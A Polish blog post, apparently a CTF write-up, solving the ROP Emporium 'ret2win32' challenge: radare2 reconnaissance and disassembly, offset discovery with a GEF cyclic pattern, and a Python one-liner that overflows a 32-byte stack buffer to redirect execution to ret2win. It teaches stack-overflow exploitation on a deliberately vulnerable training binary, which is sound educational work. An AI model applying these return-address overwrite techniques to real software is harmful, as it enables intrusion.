"No przecież piszę tego posta..." - foxtrot_charlie

0bd2f9b87f862629f04ba850c60bb890f9a80c7ca7e293503f298a93c08b6c54

0x00 - Wracamy po dłuższej przerwie

Ostatni rok był dla mnie bardzo szczególny. Nie wchodząc nadmiernie w nudne tłumaczenia, chciałbym zdementować jakobym rzucił tego bloga. Po prostu brakło czasu, a skill sam się nie wyekspi. Co nie znaczy, że zostałem pr0 h4Xi0r3m. Do tego jeszcze długa droga, tym niemniej wracam na scenę (taką jednoosobową, jak ten blog!). Skoro nowy rok to i stary ja :D!

Tym nieco zrzędliwym wstępem rozpocząłem kolejny wpis po polskiej stronie bloga. Bardzo chciałbym pisać częśćiej. I mam wrażenie, że to się uda… Na razie przede mną jeden z ważniejszych CTFów w życiu - obrona pracy dyplomowej, więc jeśli FC zamilknie w lutym, to proszę nie wysyłać CSAR ani MEDEVAC. A co dziś w menu?

Osobiście uważam ROP za jedną z ciekawszych form eksploitacji. Lata frywolnego wywalania programów i wykonywania dowolnego kodu (Phrack - Smashing the Stack for Fun and Pofit) zostało ukrócone przez DEP/NX, W xor X, ASLR. Ktoś mądry stwierdził wtedy, że nie to nie, skoro nie mogę użyć własnego kodu, to sobie wykorzystam kod programu, skoro już tam jest.

Zawsze aby lepiej zrozumieć zagadnienie, lubię sobie nad nim troszeczkę pogłówkować i spróbować rozwiązać jakiś problem, nazwijmy go inżynierski. Dlatego postanowiłem przećwiczyć cough programowanie zorientowane na powracanie cough (przepraszam, nie mogłem się oprzeć…), na zadankach CTFowych. Ale żeby daleko ich nie szukać, na warsztat wziąłem znane taski ze zbioru ROP Emporium.

W każdym kolejnym poście postaram się poruszyć jedno wyzwanie z ROP.

Na wstępie chciałbym zaznaczyć, że niniejszy artykuł to zbiór moich notatek z placu boju. Mogą się pojawić skróty myślowe oraz nie do końca śmieszny humor

0x01 ret2win32 - rozpoznanie

Pierwszym zadaniem z serii ROP-E jest ret2win <spoiler_alert=off\>. Celem tego wyzwania będzie przekierowanie flow programu przez nadpisanie adresu powrotu.

Odpaliwszy najbardziej hakierską dystrybucję Linuxa we Wszechświecie (no dobra, drugą po Pentoo, ale nie miałem czasu na kompilację) możemy zaczynać! Na początek niewielki rekonesans. Niby to zadanie zostało dobrze opisane przez Autorów, niemniej w celu odkurzenia narzędzi przeprowadzę szybkie rozpoznanie. Warto pamiętać, że:

Godziny prób i błędów mogą zaoszczędzić 5 minut czytania dokumentacji

Dlatego weryfikacja obietnic złożonych przy linku z zadaniem może się przydać i pomoże utwierdzić się w przekonaniu o zrozumieniu założeń wyzwania.


[0x08048480]> i
blksz  0x0
block  0x100
fd    3
file   ret2win32
format  elf
iorw   false
mode   r-x
size   0x1e04
humansz 7.5K
type   EXEC (Executable file)
arch   x86
baddr  0x8048000
binsz  6442
bintype elf
bits   32
canary  false
sanitiz false
class  ELF32
crypto  false
endian  little
havecode true
intrp  /lib/ld-linux.so.2
laddr  0x0
lang   c
linenum true
lsyms  true
machine Intel 80386
maxopsz 16
minopsz 1
nx    true
os    linux
pcalign 0
pic   false
relocs  true
relro  partial
rpath  NONE
static  false
stripped false
subsys  linux
va    true

32 bitowy ELF, bez kanarków na stosie, NX włączony, binarka nieostripowana. Spójrzmy na funkcje…


root@kali:~/rop# r2 ret2win32
 -- Experts agree, security holes suck, and we fixed some of them!
[0x08048480]> aaaaaaa
An r2 developer is coming to your place to manually analyze this program. Please wait for it

--press any key--

Niestety czekałem ponad 4h i nikt nie przyszedł. Spróbuję w inny dzień. To by było na tyle, cześć!*

No dobra, głupio wrzucać post z teaserem rozwiązania zadania, po czym kończyć dlatego, że mi licencja na developerów radare2 wygasła. Poniższy listing pokazuje listę funkcji w rozważanej binarce.


[0x08048480]> aaaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[x] Enable constraint types analysis for variables
[0x08048480]> afl
0x080483c0  3 35      sym._init
0x08048400  1 6      sym.imp.printf
0x08048410  1 6      sym.imp.fgets
0x08048420  1 6      sym.imp.puts
0x08048430  1 6      sym.imp.system
0x08048440  1 6      sym.imp.__libc_start_main
0x08048450  1 6      sym.imp.setvbuf
0x08048460  1 6      sym.imp.memset
0x08048470  1 6      sub.__gmon_start_8048470
0x08048480  1 33      entry0
0x080484b0  1 4      sym.__x86.get_pc_thunk.bx
0x080484c0  4 43      sym.deregister_tm_clones
0x080484f0  4 53      sym.register_tm_clones
0x08048530  3 30      sym.__do_global_dtors_aux
0x08048550  4 43  -> 40  entry.init0
0x0804857b  1 123     sym.main
0x080485f6  1 99      sym.pwnme
0x08048659  1 41      sym.ret2win
0x08048690  4 93      sym.__libc_csu_init
0x080486f0  1 2      sym.__libc_csu_fini
0x080486f4  1 20      sym._fini

Trzy funkcje, na które napewno warto spojrzeć:

0x0804857b  1 123     sym.main
0x080485f6  1 99      sym.pwnme
0x08048659  1 41      sym.ret2win

0x01 ret2win32 - szybka eksploitacja

Ale zanim przejdziemy do dalszej części tego zadania, odpalmy binarkę:


root@kali:~/rop# ./ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

SIDENOTE: uruchomienie nastąpiło z roota, ale na VMce ze zaktualizowanym HyperVizorem więc mam nadzieję, że przeżyję ;)

Baner binarki nie kłamał. Rzeczywiście próbuje zmieścić trochę więcej danych niż faktyczna pojemność bufora (albo segfault rzucany jest z innego powodu gdy podamy input > 32 znaków, zaraz to sprawdzimy). Spójrzmy najpierw na funkcję main.


[0x08048480]> pdf @ sym.main
      ;-- main:
 (fcn) sym.main 123
  int sym.main (int argc, char **argv, char **envp);
      ; var int local_4h @ ebp-0x4
      ; arg int arg_4h @ esp+0x4
      ; DATA XREF from entry0 (0x8048497)
      0x0804857b   8d4c2404    lea ecx, [arg_4h]      ; 4
      0x0804857f   83e4f0     and esp, 0xfffffff0
      0x08048582   ff71fc     push dword [ecx - 4]
      0x08048585   55       push ebp
      0x08048586   89e5      mov ebp, esp
      0x08048588   51       push ecx
      0x08048589   83ec04     sub esp, 4
      0x0804858c   a164a00408   mov eax, dword [obj.stdout] ; obj.stdout__GLIBC_2.0 ; [0x804a064:4]=0
      0x08048591   6a00      push 0
      0x08048593   6a02      push 2           ; 2
      0x08048595   6a00      push 0
      0x08048597   50       push eax
      0x08048598   e8b3feffff   call sym.imp.setvbuf    ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
      0x0804859d   83c410     add esp, 0x10
      0x080485a0   a140a00408   mov eax, dword [obj.stderr] ; obj.stderr__GLIBC_2.0 ; [0x804a040:4]=0
      0x080485a5   6a00      push 0
      0x080485a7   6a02      push 2           ; 2
      0x080485a9   6a00      push 0
      0x080485ab   50       push eax
      0x080485ac   e89ffeffff   call sym.imp.setvbuf    ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
      0x080485b1   83c410     add esp, 0x10
      0x080485b4   83ec0c     sub esp, 0xc
      0x080485b7   6810870408   push str.ret2win_by_ROP_Emporium ; 0x8048710 ; "ret2win by ROP Emporium"
      0x080485bc   e85ffeffff   call sym.imp.puts      ; int puts(const char *s)
      0x080485c1   83c410     add esp, 0x10
      0x080485c4   83ec0c     sub esp, 0xc
      0x080485c7   6828870408   push str.32bits       ; 0x8048728 ; "32bits\n"
      0x080485cc   e84ffeffff   call sym.imp.puts      ; int puts(const char *s)
      0x080485d1   83c410     add esp, 0x10
      0x080485d4   e81d000000   call sym.pwnme
      0x080485d9   83ec0c     sub esp, 0xc
      0x080485dc   6830870408   push str.Exiting      ; 0x8048730 ; "\nExiting"
      0x080485e1   e83afeffff   call sym.imp.puts      ; int puts(const char *s)
      0x080485e6   83c410     add esp, 0x10
      0x080485e9   b800000000   mov eax, 0
      0x080485ee   8b4dfc     mov ecx, dword [local_4h]
      0x080485f1   c9       leave
      0x080485f2   8d61fc     lea esp, [ecx - 4]
      0x080485f5   c3       ret
[0x08048480]>

Wywoływana z main(), funkcja sym.pwnme została przedstawiona na listingu poniżej. Jak można się domyślić, to jest nasza podatna funkcja. W celu rozwiązania zadania (i przeczytania zawartości pliku flag.txt) należy wykorzystać błędną sanityzację danych (a właściwie błędną obsługę ich długości) aby przekierować wykonanie kodu do funkcji sym.ret2win


[0x08048480]> pdf @ sym.pwnme
 (fcn) sym.pwnme 99
  sym.pwnme ();
      ; var int local_28h @ ebp-0x28
      ; CALL XREF from sym.main (0x80485d4)
      0x080485f6   55       push ebp
      0x080485f7   89e5      mov ebp, esp
      0x080485f9   83ec28     sub esp, 0x28        ; '('
      0x080485fc   83ec04     sub esp, 4
      0x080485ff   6a20      push 0x20          ; 32
      0x08048601   6a00      push 0
      0x08048603   8d45d8     lea eax, [local_28h]
      0x08048606   50       push eax
      0x08048607   e854feffff   call sym.imp.memset     ; void *memset(void *s, int c, size_t n)
      0x0804860c   83c410     add esp, 0x10
      0x0804860f   83ec0c     sub esp, 0xc
      0x08048612   683c870408   push str.For_my_first_trick__I_will_attempt_to_fit_50_bytes_of_user_input_into_32_bytes_of_stack_buffer___What_could_possibly_go_wrong ; 0x804873c ; "For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;\nWhat could possibly go wrong?"
      0x08048617   e804feffff   call sym.imp.puts      ; int puts(const char *s)
      0x0804861c   83c410     add esp, 0x10
      0x0804861f   83ec0c     sub esp, 0xc
      0x08048622   68bc870408   push str.You_there_madam__may_I_have_your_input_please__And_don_t_worry_about_null_bytes__we_re_using_fgets ; 0x80487bc ; "You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!\n"
      0x08048627   e8f4fdffff   call sym.imp.puts      ; int puts(const char *s)
      0x0804862c   83c410     add esp, 0x10
      0x0804862f   83ec0c     sub esp, 0xc
      0x08048632   6821880408   push 0x8048821
      0x08048637   e8c4fdffff   call sym.imp.printf     ; int printf(const char *format)
      0x0804863c   83c410     add esp, 0x10
      0x0804863f   a160a00408   mov eax, dword [obj.stdin] ; obj.stdin__GLIBC_2.0 ; [0x804a060:4]=0
      0x08048644   83ec04     sub esp, 4
      0x08048647   50       push eax
      0x08048648   6a32      push 0x32          ; '2' ; 50
      0x0804864a   8d45d8     lea eax, [local_28h]
      0x0804864d   50       push eax
      0x0804864e   e8bdfdffff   call sym.imp.fgets     ; char *fgets(char *s, int size, FILE *stream)
      0x08048653   83c410     add esp, 0x10
      0x08048656   90       nop
      0x08048657   c9       leave
      0x08048658   c3       ret
[0x08048480]>

Sama docelowa funkcja, którą należy wykonać jest bardzo prosta:


[0x08048480]> pdf @ sym.ret2win
 (fcn) sym.ret2win 41
  sym.ret2win ();
      0x08048659   55       push ebp
      0x0804865a   89e5      mov ebp, esp
      0x0804865c   83ec08     sub esp, 8
      0x0804865f   83ec0c     sub esp, 0xc
      0x08048662   6824880408   push str.Thank_you__Here_s_your_flag: ; 0x8048824 ; "Thank you! Here's your flag:"
      0x08048667   e894fdffff   call sym.imp.printf     ; int printf(const char *format)
      0x0804866c   83c410     add esp, 0x10
      0x0804866f   83ec0c     sub esp, 0xc
      0x08048672   6841880408   push str.bin_cat_flag.txt  ; 0x8048841 ; "/bin/cat flag.txt"
      0x08048677   e8b4fdffff   call sym.imp.system     ; int system(const char *string)
      0x0804867c   83c410     add esp, 0x10
      0x0804867f   90       nop
      0x08048680   c9       leave
      0x08048681   c3       ret
[0x08048480]>

0x08048677 to adres wywołania funkcji system() z argumentem "/bin/cat flag.txt" (wrzucony na stack instrukcję wyżej). To musi być cel! (A niby wystarczyło pobrać zbiór zadań i dla każdego zipa wyświetlić flag.txt ;P )

No dobrze, więc jak do tego przystąpić? Zacznijmy od analizy sym.pwnme i określenia liczby bajtów potrzebnych do nadpisania instruction pointera. Do tego celu użyłem GDB wraz z rozszerzeniem GEF. Korzystając z ciągu de Bruijna:


gef➤ pattern create 50
[+] Generating a pattern of 50 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
[+] Saved as '$_gef0'
gef➤ r
Starting program: /root/rop/ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama

Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$eax  : 0xffffd300"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam"
$ebx  : 0x0
$ecx  : 0xf7fa789c → 0x00000000
$edx  : 0xffffd300"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaam"
$esp  : 0xffffd3300xf7fe006d jge 0xf7fe0077
$ebp  : 0x6161616b ("kaaa"?)
$esi  : 0xf7fa6000 → 0x001d9d6c
$edi  : 0xf7fa6000 → 0x001d9d6c
$eip  : 0x6161616c ("laaa"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
────────────────────────────────────── stack ────
0xffffd330│+0x0000: 0xf7fe006d jge 0xf7fe0077	 ← $esp
0xffffd334│+0x0004: 0xffffd350 → 0x00000001
0xffffd338│+0x0008: 0x00000000
0xffffd33c│+0x000c: 0xf7de6b41<__libc_start_main+241> add esp, 0x10
0xffffd340│+0x0010: 0xf7fa6000 → 0x001d9d6c
0xffffd344│+0x0014: 0xf7fa6000 → 0x001d9d6c
0xffffd348│+0x0018: 0x00000000
0xffffd34c│+0x001c: 0xf7de6b41<__libc_start_main+241> add esp, 0x10
───────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x6161616c
───────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ret2win32", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────trace ────
gef➤ pattern search $eip
[+] Searching '$eip'
[+] Found at offset 44 (little-endian search) likely
[+] Found at offset 41 (big-endian search)
gef➤ 

Adresem funkcji, pod który trzeba powrócić po wykonaniu sym.pwnme jest 0x08048659. Czy to wystarczy? W tym przypadku powinno. Aby się o tym przekonać, zapiszmy cały bufor losowymi wartościami - długość tego ciągu powinna wynosić 44 bajty, a następnie nadpiszmy wartość powrotu adresem ret2win. Oto efekt:


root@kali:~/rop# python -c "print 'A'*44 + '\x59\x86\x04\x08' " | ./ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}

ROPE{a_placeholder_32byte_flag!}

Badum tss! Dobra, czas na coś trudniejszego…

Do zobaczenia w Internecie!

foxtrot_charlie